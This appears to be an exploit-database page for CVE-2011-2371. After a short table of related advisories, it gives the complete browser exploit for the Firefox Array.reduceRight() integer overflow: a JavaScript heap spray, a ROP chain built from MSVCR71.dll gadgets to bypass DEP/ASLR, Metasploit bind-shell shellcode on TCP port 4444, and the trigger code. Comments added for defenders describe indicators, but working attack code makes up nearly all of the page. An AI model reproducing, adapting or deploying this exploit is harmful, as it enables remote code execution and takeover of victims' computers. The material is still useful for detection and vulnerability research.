| Title | Published | Views | Reporter | Family |
|---|---|---|---|---|
| Mozilla Firefox Array.reduceRight() Integer Overflow Exploit | 11 Oct 2011 00:00 | – | zdt | |
| Mozilla Firefox Array.reduceRight() Integer Overflow | 12 Oct 2011 00:00 | – | zdt | |
| Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit | 27 Feb 2012 00:00 | – | zdt | |
| Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities | 21 Jun 2011 00:00 | – | nessus | |
| Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities | 21 Jun 2011 00:00 | – | nessus | |
| Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities | 21 Jun 2011 00:00 | – | nessus | |
| Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities | 21 Jun 2011 00:00 | – | nessus | |
| Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities | 21 Jun 2011 00:00 | – | nessus | |
| Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities | 21 Jun 2011 00:00 | – | nessus | |
| CentOS 4 / 5 : firefox (CESA-2011:0885) | 23 Jun 2011 00:00 | – | nessus | |
# Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
# Date: 12 Oct 2011
# Author: Matteo Memelli ryujin -AT- offensive-security.com
# CVE-2011-2371
# Full exploit package: http://www.exploit-db.com/sploits/17974.zip
<html>
<head>
<title>ff-i-<3-u</title>
</head>
<body>
<center>
<br />
Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br />
Date: 12 Oct 2011<br />
Author: Matteo Memelli ryujin -AT- offensive-security.com<br />
CVE-2011-2371<br />
Full exploit package: <br />
http://www.exploit-db.com/sploits/17974.zip <br />
<br />
Thx to dookie for helping ;)<br/>
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br />
http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/>
DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/>
Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/>
<APPLET id="MyApplet" code="ph33r.class" width=150 height=50>
You need a Java-enabled browser to pwn this.
</APPLET>
</center>
<script type="text/javascript">
// Looks up the <APPLET id="MyApplet"> element declared in the page body.
// The variable is not referenced again anywhere in the visible script.
// NOTE(review): the page header credits its DEP/ASLR bypass to the "JAVA
// MSVCR71" ROP chain, so the applet presumably exists to get the Java
// plug-in (and its MSVCR71.dll) loaded into the browser process - confirm.
// Defender note: a browser without the Java plug-in would not load that
// module on behalf of this page.
var applet = document.getElementById('MyApplet');
// spray(): heap-spray stage of the public proof-of-concept for CVE-2011-2371.
//
// Builds one large string laid out as
//   ptrs (fake object pointers) + esppadding (0x0c0c filler) +
//   rop (MSVCR71.dll gadget chain with the payload appended) +
//   tr_padding (0x0c0c filler),
// cuts it to just under 0x80000 characters and appends it to 0x40 array
// slots. Takes no arguments and returns nothing; it assigns the globals
// rop, HeapBlocks and i (none of them is declared with var).
//
// Defender notes:
//  - Static indicators visible in this function: long unescape("%uXXXX")
//    literals, 0x0c0c filler, string-doubling loops that grow to 0x80000
//    characters, and a loop storing the same large string in many slots.
//  - Every gadget address below lies in 0x7c34xxxx-0x7c38xxxx and the
//    original comments attribute them to MSVCR71.dll, so the chain
//    presumably depends on that module being loaded at a fixed base.
//  - The payload is labelled below as Metasploit windows/shell_bind_tcp with
//    LPORT=4444; a TCP/4444 listener owned by the browser process is
//    therefore a host and network indicator for this exact sample.
//  - The advisory listing on this page names Firefox 3.6.18, Firefox 5.0 and
//    Thunderbird 3.1.11 as the releases that are no longer affected.
function spray() {
// fake object pointers
var ptrs = unescape("%u4141" + // padding
// MOV EDX,DWORD[ESI] 0c000048=0c00007c
"%u0048%u0c00" +
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141" + // padding
// PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3]
// RETN 1C75
"%u0EEF%u7C37" +
"%u4141%u4141" + // padding
"%u4141" + // padding
"%u240c%u3410" + // 3410240c RETN after PIVOT
"%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u4141%u4141" + // padding
"%u002e%u0c00"); // 0c00007c -> 0c00002e
// CALL PIVOT 0x7C370EEF
// Both values below are character counts (bytes / 2) that are subtracted
// from the final block size further down.
var bheader = 0x12/2; // u.n.d.e.f.i.n.e.d. string
// beginning of each array element
var nullt = 0x2/2; // string null terminator
// 0:000> ? 0c001cbe - 0c000012
// Evaluate expression: 7340 = 00001cac
var espoffset = (7340 /2) - ptrs.length;
var esppadding = unescape("%u0c0c%u0c0c");
// Double the filler until it is long enough, then trim to the exact length.
while(esppadding.length < espoffset) {esppadding += esppadding;}
esppadding = esppadding.substring(0, espoffset);
// sayonara rop chain
// NOTE(review): rop is assigned without var, so it becomes an implicit global.
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u0c0c%u0c0c"); // NOP / MOV ESP,0x0c0c0c0c
// windows/shell_bind_tcp - 341 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// The payload is appended directly after the last gadget.
rop += shell;
var tr_padding = unescape("%u0c0c%u0c0c");
// Same doubling pattern as above; the result is at least 0x80000 characters.
while(tr_padding.length < 0x80000) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + rop + tr_padding;
// Trim so that prefix + data + terminator add up to 0x80000 characters.
var hspray = dummy.substring(0,0x80000 - bheader - nullt);
// Allocation of 64 blocks of 1Mb.
// HeapBlocks and i are implicit globals. Each slot starts out undefined, so
// += stores the string "undefined" followed by hspray; that nine-character
// prefix is what bheader accounts for.
HeapBlocks = new Array()
for (i=0;i<0x40;i++){
HeapBlocks[i] += hspray;
}
}
// Trigger stage of the CVE-2011-2371 proof-of-concept.
// The spray runs first so that its data is already in memory when
// reduceRight() is called below.
spray();
// hola is an implicit global: an array that never receives any elements.
hola = new Array;
// 2197815302 is larger than 2^31 - 1, so it does not fit in a signed 32-bit
// integer. The advisory title describes the flaw as an integer overflow in
// Array.reduceRight(); the original comment gives the address that the
// resulting out-of-bounds element read is expected to land on.
// Defender note: a script that sets an array length above 0x7fffffff and
// then calls reduceRight() on that array is the recognisable shape of this
// trigger.
hola.length = 2197815302; // 0x0c000014 beginning of sprayed block
// Callback passed to reduceRight(). It reads a property of the element it is
// handed; per the original comment, that property access is what makes the
// engine use the bogus value.
w00t = function ph33r(prev, myobj, indx, array) {
alert(myobj[0]); // trigger getProperty
}
// 1 is the initial accumulator value; reduceRight() takes no further
// arguments, so 2 and 3 are ignored. On an engine without the flaw the array
// has no elements, so the callback should never run and the call should
// simply return 1.
hola.reduceRight(w00t,1,2,3);
</script>
</body>
</html>